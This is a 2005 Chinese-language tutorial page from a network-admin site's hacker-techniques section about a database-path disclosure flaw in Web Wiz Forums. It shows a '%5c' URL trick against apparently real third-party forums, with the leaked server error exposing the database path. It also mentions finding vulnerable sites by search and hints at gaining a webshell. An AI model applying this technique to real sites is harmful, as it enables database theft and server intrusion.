网管联盟 | 网管论坛 | 网管u家 | 网管博客 | 网管软件 | 网管求职 | 小游戏 | 网管搜索 | 网管原创 | 网管聚合 | 网管读摘 | 网管焦点 | 世界素材 | 会员投稿 | 会员中心 
中国网管联盟
Windows Linux Cisco 网络技术 数据库 黑客攻防 DotNet Java PHP 认证 新闻资讯 服务器 存储资讯 网络设备 网管学堂 技术专题 焦点 网吧频道
 当前位置: > bitsCN.com > 网络攻防 > 黑客技术 > 入门教程 > Web Wiz Forums论坛的暴库漏洞  

Web Wiz Forums论坛的暴库漏洞

2005-02-14  作者:BitsCN整理  来源:中国网管联盟  点评 投稿 收藏

作者: lis0http://www.bjtaekwondo.org.cn/liso/
Web Wiz Forums是国外一个免费的ASP论坛软件,国内又名"超级异彩论坛"论坛的形式很象国产精品动网论坛,功能上很强大。今天无意中发现可以暴库
比如 _topics.asp?FID=6" target=_blank>http://www.nuoya.org/bbs%5cforum_topics.asp?FID=6
出现了如下:
<TITLE>诺亚安全</TITLE>
<font face="宋体" size=2>
<p>Microsoft JET Database Engine</font> <font face="宋体" size=2 > 错误 '80004005'</font>
<p>
<font face="宋体" size=2>'d:\www\zzzazzz\admin\database\zzzbzzz.asp'不是一个有效的路径。 确定路径名称拼写是否正确,以及是否连接到文件存放的服务器。</font>
<p>
<font face="宋体" size=2>/bbs/common.asp</font><font face="宋体" size=2>,行261</font>
由于是国外的E文论坛 国内汉化有很乱 所以版本有的没有防范 有的作了防范 使用这个论坛的要注意要了

网管u家u.bitsCN.com


其它的我也不用说了 .... 在百度中我搜索了好不少都能暴库 Powered by Web Wiz Forums version 7.6
可以暴库 低的版本我想更能暴
Code:
_rules.asp?FID=0">http://www.7234.com/forum%5cregistration_rules.asp?FID=0
好像新的版本没有这个低级的错误
至于怎样利用入侵得到webshell 我就不用说了巴 关键是*.asp的数据库的网站!


TAGs   漏洞   论坛   face   宋体   size   font   FID   版本   有的   防范      
 上一篇:CAcls命令在提权中的使用   下一篇:MSSQL注入攻击的防护
Web Wiz Forums论坛的暴库漏洞 评论:
loading.. 评论加载中…
评论:请自觉遵守互联网相关政策法规,评论不得超过250字。

验证码: 注册用户
本类热门排行:
最新推荐文章:
网管论坛交流: